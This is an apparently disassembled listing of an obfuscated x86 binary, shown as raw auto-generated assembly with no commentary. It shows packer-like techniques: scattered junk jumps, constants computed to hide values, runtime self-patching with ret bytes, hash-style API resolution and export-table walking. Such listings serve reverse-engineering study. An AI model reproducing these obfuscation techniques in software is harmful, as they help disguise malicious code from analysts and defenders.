		mov	[edi], ebx

loc_442504:				; CODE XREF: sub_4570C0:loc_44BA70j
		call	sub_4436CE
		mov	edx, 0F75CA70h
		call	sub_45B20A
		jmp	loc_45BF7B
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_442518:				; CODE XREF: sub_4424CF+D38Dj
		jnb	loc_446D58
		jnb	loc_45423D
		jmp	loc_44B1AF
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_442529:				; CODE XREF: sub_44B912-A41j
		cmp	dword ptr [ebp-8], 0
		jz	loc_44B072
		jmp	loc_4461C3
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		xor	edi, 1F1FC471h
		jmp	sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_442543:				; CODE XREF: sub_447664:loc_446E0Bj
		push	edx
		push	ecx
		push	0EA136D50h
		pop	ecx
		xor	ecx, 0E95A5464h
		jmp	loc_450DE7
; END OF FUNCTION CHUNK	FOR sub_447664

; =============== S U B	R O U T	I N E =======================================



sub_442556	proc near		; CODE XREF: k2vbe3.d:0044CEDDj
					; k2vbe3.d:00458CEDp
		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		call	sub_44C1BD
		push	819A281Ch
		pop	eax

loc_442566:				; CODE XREF: k2vbe3.d:0044BF02j
		and	eax, 0D70B9B3Bh
		test	eax, 10000000h
		jmp	loc_45B2C9
sub_442556	endp


; =============== S U B	R O U T	I N E =======================================



sub_442577	proc near		; CODE XREF: k2vbe3.d:0044C968j
					; sub_442F64+16151p
		xchg	ebx, [esp+0]
sub_442577	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44257A:				; CODE XREF: sub_45A323:loc_43F805j
					; sub_45A323:loc_45B9E6j
		pop	ebx
		mov	edx, 95918C9Dh
		call	sub_45B20A
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		ror	eax, 11h
		jmp	loc_441C9D
; ---------------------------------------------------------------------------

loc_442593:				; CODE XREF: sub_45A323:loc_45A336j
		add	eax, 80E23728h
		call	sub_44A679

loc_44259E:				; CODE XREF: k2vbe3.d:004484E2j
		cdq
		rol	ebx, 17h
		not	ebx
		jbe	loc_4404C5
		jmp	loc_44BEA9
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_4425AF:				; CODE XREF: k2vbe3.d:0044BADDj
		test	al, al
		jz	locret_44D802
		jmp	loc_455CB6
; ---------------------------------------------------------------------------
		jns	loc_440E0B
		jmp	sub_444BA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_4425C7:				; CODE XREF: sub_44E0F6-EE95j
		pop	eax
		and	eax, 14CA184Bh
		sub	eax, 2ED9D9C0h
		or	eax, 0A28A9DE1h
		add	eax, 46231F75h
		push	offset loc_4485AD
		jmp	loc_43FB6E
; END OF FUNCTION CHUNK	FOR sub_44E0F6

; =============== S U B	R O U T	I N E =======================================



sub_4425EA	proc near		; DATA XREF: sub_43D0A9+1B3ADo

; FUNCTION CHUNK AT 0044CFB7 SIZE 00000005 BYTES

		pop	ebx
		lea	eax, sub_43D0A9
		mov	byte ptr [eax],	0C3h
		jmp	loc_44CFB7
sub_4425EA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_4425F9:				; CODE XREF: sub_43D0A9j
		pop	edx
		jmp	loc_445467
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_457A58
; ---------------------------------------------------------------------------

loc_442605:				; CODE XREF: k2vbe3.d:loc_44D3D7j
		mov	eax, ecx
		pop	eax
		xchg	edi, [esp]
		mov	ebx, edi
		jmp	loc_44D482
; ---------------------------------------------------------------------------
		jno	loc_43D02F

loc_442618:				; CODE XREF: k2vbe3.d:loc_45430Dj
		jmp	loc_4409D1
; ---------------------------------------------------------------------------

loc_44261D:				; DATA XREF: sub_443A30+16690o
		xchg	edi, [esp]
		mov	ecx, edi
		pop	edi
		add	ecx, 27FE64EAh
		or	ecx, 6FFA06BDh
		xor	ecx, 0D1845DBFh
		jmp	loc_44F43C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44263A:				; CODE XREF: sub_443FC1:loc_459238j
		pop	ebx
		sub	ebx, 6EF76919h
		xor	ebx, 129E1D0Bh
		test	ebx, 2000000h
		jmp	loc_44D3C2
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

loc_442652:				; DATA XREF: sub_44F20A-211Fo
		test	al, al
		jnz	loc_45686D
		mov	eax, [ebp-4]
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44265D:				; CODE XREF: sub_44B94B:loc_447F02j
		cmp	byte ptr [eax],	0E8h
		jnz	loc_44C005
		jmp	loc_451658
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_44266B:				; CODE XREF: sub_43D023+6j
					; sub_445541:loc_43D1EEj ...
		push	offset sub_43F027
		jmp	nullsub_165
; END OF FUNCTION CHUNK	FOR sub_43D023

; =============== S U B	R O U T	I N E =======================================



sub_442675	proc near		; CODE XREF: k2vbe3.d:0043F6AAj
					; sub_45AD42-2215p

; FUNCTION CHUNK AT 0044C172 SIZE 00000008 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		movzx	eax, word ptr [eax]
		shl	eax, 2
		mov	edx, [ebp-14h]
		mov	edx, [edx+1Ch]
		add	edx, [ebp-4]
		add	eax, edx
		jmp	loc_44C172
sub_442675	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E73

loc_44268F:				; CODE XREF: sub_443E73+5j
		mov	eax, [esp+0]
		call	sub_4504F3
; END OF FUNCTION CHUNK	FOR sub_443E73
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_442697:				; CODE XREF: sub_456C5F-47Ej
		jmp	sub_448D7F
; END OF FUNCTION CHUNK	FOR sub_456C5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_44269C:				; CODE XREF: sub_447E07-451Ej
		jmp	loc_457DA0
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_4426A1:				; CODE XREF: k2vbe3.d:0043EDB9j
		jmp	locret_44A0E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1A

loc_4426A6:				; CODE XREF: sub_43DF1A+10j
		jmp	nullsub_507
; END OF FUNCTION CHUNK	FOR sub_43DF1A
; ---------------------------------------------------------------------------
		xor	ebp, edx
		rol	edi, 19h
		jmp	sub_44BB73
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_155. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_4426B6:				; CODE XREF: sub_444B3E+16CFFj
		jmp	loc_4513A7
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_4426BB:				; CODE XREF: sub_457DCA-84F9j
		add	eax, 0D433CC99h
		add	eax, ebp
		add	eax, 0FC5C4465h
		mov	eax, [eax]
		mov	edx, [ebp-104h]
		mov	dl, [edx]
		mov	[ebp+eax-100h],	dl
		jmp	loc_453C8B
; END OF FUNCTION CHUNK	FOR sub_457DCA

; =============== S U B	R O U T	I N E =======================================



sub_4426DF	proc near		; CODE XREF: sub_403ACE+9p
					; sub_40B64A+35p
					; DATA XREF: ...

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043DB5A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DECE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E99D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442D6D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00443E98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004453F2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00445EF7 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004471AF SIZE 0000002D BYTES
; FUNCTION CHUNK AT 00447EA3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004490A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449E30 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AA1A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C326 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004503EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450A4F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00450AA7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00450E5A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00451653 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454DA2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045635C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00458EEA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00459DD7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AC6D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AF54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B295 SIZE 00000005 BYTES

		jnb	loc_4471CC
		mov	eax, ds:dword_44CA30
		or	eax, eax

loc_4426ED:				; CODE XREF: sub_44B2D7+E11Aj
		jnz	loc_43DB5A
		jmp	loc_44C326
sub_4426DF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4426F8	proc near		; DATA XREF: k2vbe3.d:004565DFo

; FUNCTION CHUNK AT 0044980A SIZE 00000005 BYTES

		ror	eax, 0Ah
		jmp	loc_44980A
sub_4426F8	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_442700	proc near		; CODE XREF: sub_43E282j

; FUNCTION CHUNK AT 0043CF9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F16C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440BF6 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00445EF2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454BE4 SIZE 00000015 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		call	sub_451E00

loc_442709:				; CODE XREF: k2vbe3.d:0044A422j
		jmp	loc_440BF6
sub_442700	endp

; ---------------------------------------------------------------------------

loc_44270E:				; CODE XREF: k2vbe3.d:loc_447DE3j
					; k2vbe3.d:00447E02j
		add	esi, 705FA80Ah
		xchg	esi, [esp]
		push	0
		push	10h
		jmp	loc_449D57
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_231. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_442721:				; CODE XREF: sub_454E69+Fj
		jmp	loc_441326
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454354

loc_442726:				; CODE XREF: sub_454354-13694j
		add	esi, 0D1BD0E9Bh
		jmp	loc_45408A
; END OF FUNCTION CHUNK	FOR sub_454354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_442731:				; CODE XREF: sub_45C041-9A1Ej
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_45408A
; END OF FUNCTION CHUNK	FOR sub_45C041
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_442740:				; CODE XREF: sub_45A323-16AFAj
		jmp	loc_44F3D1
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_442745	proc near		; CODE XREF: k2vbe3.d:0043EDC3p
					; k2vbe3.d:00440EF9j

; FUNCTION CHUNK AT 00444D2B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446D79 SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_4553CC
		push	edx
		jmp	loc_446D79
sub_442745	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_442754:				; CODE XREF: k2vbe3.d:00445605j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_442755:				; CODE XREF: sub_44921C+F604j
		jmp	sub_43E0F5
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44275A:				; CODE XREF: sub_4553CC-18F4j
		jmp	loc_44D30B
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_44275F:				; CODE XREF: k2vbe3.d:0043FC65j
		jge	loc_447ADD
		or	edi, 40CBD8F6h
		popf
		cmp	ecx, 9C177DA5h
		jmp	loc_4446C1
; ---------------------------------------------------------------------------
		mov	ds:off_41E1FC, eax
		lea	eax, sub_44EEFE
		mov	byte ptr [eax],	0C3h
		jmp	loc_44DC83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_44278B:				; CODE XREF: sub_44EEFE:loc_450963j
		mov	eax, [esp+0]
		push	edi
		mov	edi, edx
		jmp	loc_44D98F
; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------
		mov	ds:off_41E034, eax
		lea	eax, loc_4552E2
		mov	byte ptr [eax],	0C3h
		jmp	loc_4552E2

; =============== S U B	R O U T	I N E =======================================



sub_4427AA	proc near		; CODE XREF: sub_41AAD0+284p
					; sub_41AAD0+2B2p ...
		call	sub_4427BF
		jmp	ds:off_41E038
sub_4427AA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_4427B5:				; CODE XREF: sub_44CA34+F495j
		jmp	loc_43FDFF
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_4427BA:				; CODE XREF: sub_444B3E+6C7Dj
		jmp	nullsub_342
; END OF FUNCTION CHUNK	FOR sub_444B3E

; =============== S U B	R O U T	I N E =======================================



sub_4427BF	proc near		; CODE XREF: sub_4427AAp
					; sub_44D419:loc_44E349j ...
		push	offset loc_441707
		jmp	nullsub_30
sub_4427BF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_4427C9:				; CODE XREF: sub_45000F:loc_454A02j
		or	esi, 3B877F6Ah
		xor	esi, 7FC66A72h
		xor	eax, esi
		push	offset sub_447594
		jmp	loc_44DD85
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D98C

loc_4427E1:				; CODE XREF: sub_43D98C:loc_44A0ADj
		jz	loc_43FCDC
		push	offset loc_450BCF
		jmp	loc_44D527
; END OF FUNCTION CHUNK	FOR sub_43D98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_4427F1:				; CODE XREF: sub_45B20A-E6D8j
		rol	edi, 1Ch
		add	edi, 5382E386h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_9
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_9
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
		call	nullsub_519
		jmp	ds:dword_41E0E0
; ---------------------------------------------------------------------------

loc_442816:				; CODE XREF: k2vbe3.d:00447CFEj
		jmp	loc_45B60D
; ---------------------------------------------------------------------------
		db 3Eh
dword_44281C	dd 38EFBAC1h		; DATA XREF: sub_446964-3F9Cr
					; k2vbe3.d:loc_44B4D8w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E9D

loc_442820:				; CODE XREF: sub_443E9D+11ECBj
		jmp	sub_443E9D
; END OF FUNCTION CHUNK	FOR sub_443E9D
; ---------------------------------------------------------------------------
		db 6Bh,	50h, 84h
dword_442828	dd 77DD0000h		; DATA XREF: k2vbe3.d:loc_440FB7r
					; sub_45C0CD:loc_44195Cr ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_44282C:				; CODE XREF: sub_44DB59-616Bj
		jmp	loc_457512
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
aSCFEE3fD	db '‘šC°F³…Á¥3F¸d±±',0  ; DATA XREF: k2vbe3.d:0044052Bo
					; sub_440C94+E2DAo
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459729

loc_442841:				; CODE XREF: sub_459729+9j
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_459729
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED1F

loc_442846:				; CODE XREF: sub_43ED1F+184CCj
		jmp	loc_43F00D
; END OF FUNCTION CHUNK	FOR sub_43ED1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_44284B:				; CODE XREF: sub_44921C+872Fj
		jmp	loc_4415B8
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_442850:				; CODE XREF: sub_44ED3C-2E98j
		jmp	nullsub_204
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_442855:				; CODE XREF: sub_45A323-13EFCj
		jmp	loc_4504EC
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		dw 0E7D2h
dword_44285C	dd 0B8EFBCF5h		; DATA XREF: sub_43C3A9+CCA0r
					; k2vbe3.d:004557B7w
dword_442860	dd 7DD60347h		; DATA XREF: k2vbe3.d:0043E7EFw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_442864:				; CODE XREF: sub_4499EC+F75Ej
		jmp	loc_4410C5
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------
		db 0D1h, 53h, 0D6h
dword_44286C	dd 581E1DF7h		; DATA XREF: sub_43D488+4r
					; k2vbe3.d:loc_44A0A1w
; ---------------------------------------------------------------------------

loc_442870:				; CODE XREF: k2vbe3.d:0044C6F9j
		jmp	loc_450ECB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B208

loc_442875:				; CODE XREF: sub_44B208+7j
		jmp	loc_44EFA8
; END OF FUNCTION CHUNK	FOR sub_44B208
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_226. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	ebp, 0E7EEDEB6h
		jmp	loc_43C1BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_442886:				; CODE XREF: sub_45A323-A1D4j
		and	edi, ecx
		push	0A66A2CA1h

loc_44288D:				; CODE XREF: k2vbe3.d:loc_451423j
		call	sub_44B979
		retn
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_442893:				; CODE XREF: sub_446E24-32D4j
		jmp	nullsub_95
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454FA8

loc_442898:				; CODE XREF: sub_454FA8+Bj
		jnz	loc_444B7A
		jmp	loc_44B229
; END OF FUNCTION CHUNK	FOR sub_454FA8
; ---------------------------------------------------------------------------
		push	0F2190D41h
		pop	edx
		or	edx, 95379D89h
		add	edx, 28170EB2h
		call	sub_45B20A
		retn
; ---------------------------------------------------------------------------

loc_4428BB:				; CODE XREF: k2vbe3.d:00458B84j
		jmp	loc_44A956
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FED

loc_4428C0:				; CODE XREF: sub_456FED-E2Fj
		jmp	nullsub_231
; END OF FUNCTION CHUNK	FOR sub_456FED
; ---------------------------------------------------------------------------

loc_4428C5:				; CODE XREF: k2vbe3.d:00442B72j
		jmp	loc_452B4E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_4428CA:				; CODE XREF: sub_4553CC-63A9j
		xor	ebx, edx

loc_4428CC:				; CODE XREF: sub_4553CC:loc_4421B2j
		push	eax
		push	offset loc_44C4DC
		jmp	loc_450297
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_4428D7:				; CODE XREF: k2vbe3.d:004450FEj
					; k2vbe3.d:0044DEADj
		push	edi
		push	797A19C2h
		pop	edi
		or	edi, 0FADDED4Bh
		jmp	loc_454E29
; ---------------------------------------------------------------------------

loc_4428E9:				; CODE XREF: k2vbe3.d:00457E09j
		jge	loc_443DDA
		and	ebp, 53C3AE39h
		popf
		jmp	loc_443DD4
; ---------------------------------------------------------------------------

loc_4428FB:				; CODE XREF: k2vbe3.d:loc_44695Fj
					; k2vbe3.d:00453D0Dj
		xchg	edx, [esp]

loc_4428FE:				; CODE XREF: k2vbe3.d:00454FE9j
		mov	ebx, edx
		pop	edx
		lea	eax, nullsub_479
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_479
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_442910:				; CODE XREF: sub_45A323+1411j
		jmp	loc_44EC6D
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_442915:				; CODE XREF: sub_44921C:loc_443AB8j
					; sub_44921C+9590j
		mov	eax, [ebp-28h]
		mov	byte ptr [eax],	64h
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-28h]
		mov	byte ptr [eax],	6Ch
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-28h]
		jmp	loc_4543F4
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------

loc_44292F:				; CODE XREF: k2vbe3.d:0043D81Ej
		jnb	loc_453BC9
		pushf

loc_442936:				; CODE XREF: k2vbe3.d:loc_440C3Ej
		call	sub_43E1FA

loc_44293B:				; CODE XREF: k2vbe3.d:00455AB3j
		jl	loc_454E57
; START	OF FUNCTION CHUNK FOR sub_44F614

loc_442941:				; CODE XREF: sub_44F614+16j
		jmp	loc_45BB70
; END OF FUNCTION CHUNK	FOR sub_44F614
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45244A

loc_442946:				; CODE XREF: sub_45244A:loc_44F345j
		jmp	loc_452FF8
; END OF FUNCTION CHUNK	FOR sub_45244A
; ---------------------------------------------------------------------------
		mov	ecx, edx
		pushf
		jl	loc_45699A
		jmp	loc_454E57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_442959:				; CODE XREF: sub_440EE3+11B60j
		call	sub_43E135
		mov	eax, 524E554Eh
		call	sub_4553CC
		mov	ds:dword_41E058, eax
		lea	eax, nullsub_257
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_257
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_4466FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_442982:				; CODE XREF: sub_43E135+14C9Cj
		jz	loc_4403AD
		jmp	loc_44F8B8
; END OF FUNCTION CHUNK	FOR sub_43E135

; =============== S U B	R O U T	I N E =======================================



sub_44298D	proc near		; CODE XREF: k2vbe3.d:0044318Cj
					; k2vbe3.d:00459BD5p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E97D SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_43E97D
sub_44298D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_442999	proc near		; DATA XREF: sub_44309C:loc_4549EDo

; FUNCTION CHUNK AT 00440EC1 SIZE 0000000C BYTES

		jnb	loc_4429AE
		cmp	dword ptr [eax], 0FFFFFFFFh
		mov	ebx, [eax+4]
		mov	eax, [eax]
		jnz	loc_4549ED
		retn
; ---------------------------------------------------------------------------

loc_4429AE:				; CODE XREF: sub_442999j
		cmp	dword ptr [eax], 0FFFFFFFFh
		jmp	loc_440EC1
sub_442999	endp

; ---------------------------------------------------------------------------
		xor	eax, 0F839F128h
		jmp	sub_441484
; ---------------------------------------------------------------------------

locret_4429C1:				; CODE XREF: k2vbe3.d:0045863Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446964

loc_4429C2:				; CODE XREF: sub_446964:loc_446142j
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44281C
		or	eax, eax
		jnz	loc_43C39F
		jmp	loc_45164D
; END OF FUNCTION CHUNK	FOR sub_446964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_4429DB:				; CODE XREF: sub_43F364:loc_43E269j
		xchg	esi, [esp+4+var_4]
		jmp	loc_447FD0
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B029

loc_4429E3:				; CODE XREF: sub_45B029:loc_44AF07j
		mov	[ebp-4], eax
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_452C93
		call	nullsub_1
		jmp	loc_44871B
; END OF FUNCTION CHUNK	FOR sub_45B029

; =============== S U B	R O U T	I N E =======================================



sub_4429FF	proc near		; CODE XREF: sub_45B029+4j

; FUNCTION CHUNK AT 0044138B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443E17 SIZE 00000005 BYTES

		add	esp, 0FFFFFED8h
		jmp	loc_44138B
sub_4429FF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DEC3

loc_442A0A:				; CODE XREF: sub_44DEC3+Aj
		push	0D62660AFh
		pop	ebx
		or	ebx, 62E4E29Fh
		rol	ebx, 0Ah
		add	ebx, 64BA8081h
; END OF FUNCTION CHUNK	FOR sub_44DEC3
; START	OF FUNCTION CHUNK FOR sub_450983

loc_442A1F:				; CODE XREF: sub_450983-14352j
		xchg	ebx, [esp+0]
		jmp	nullsub_250
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------

loc_442A27:				; CODE XREF: k2vbe3.d:0043E11Ej
		jno	loc_448572

; =============== S U B	R O U T	I N E =======================================



sub_442A2D	proc near		; CODE XREF: k2vbe3.d:004574E5p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00453F49 SIZE 0000000D BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	eax, [esp-4+arg_0]
		push	eax
		pop	ebx
		jmp	loc_453F49
sub_442A2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 86480F55h
		call	sub_4553CC
		push	edx
		push	783E44BAh
		call	sub_449392

loc_442A50:				; CODE XREF: k2vbe3.d:0043EA6Bj
		jmp	loc_43E00E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_442A55:				; CODE XREF: sub_457DCA:loc_44CF0Aj
		add	ebx, ecx
		popf
		jmp	loc_44E301
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C0CD

loc_442A5D:				; CODE XREF: sub_45C0CD:loc_44196Ej
		pop	ecx
		xor	eax, 0D3AE71A6h
		add	eax, 6EC79DA7h
		add	eax, ebp
		add	eax, 808ED2A2h
		mov	eax, [eax]
		jmp	loc_43CE67
; END OF FUNCTION CHUNK	FOR sub_45C0CD
; ---------------------------------------------------------------------------

loc_442A79:				; CODE XREF: k2vbe3.d:00448905j
		js	loc_448CF7
		pop	ecx
; START	OF FUNCTION CHUNK FOR sub_446478

loc_442A80:				; CODE XREF: sub_446478+1364Aj
		add	ebx, 12043F77h
		add	ebx, ebp
		call	sub_444BA0

loc_442A8D:				; CODE XREF: sub_450359+A986j
		jmp	loc_446C3A
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E753

loc_442A92:				; CODE XREF: sub_43E753+15j
		jmp	loc_4422D0
; END OF FUNCTION CHUNK	FOR sub_43E753
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_442A97:				; CODE XREF: sub_43CCD0+FA65j
		jnz	loc_44640E
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; START	OF FUNCTION CHUNK FOR sub_4583B8

loc_442A9D:				; CODE XREF: sub_4583B8+1Ej
		jmp	loc_443DB7
; END OF FUNCTION CHUNK	FOR sub_4583B8
; ---------------------------------------------------------------------------
		sbb	ebp, ebx
		or	ecx, 679E007Bh
		and	edi, ebx
		shr	edi, 10h
		jmp	loc_44640E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

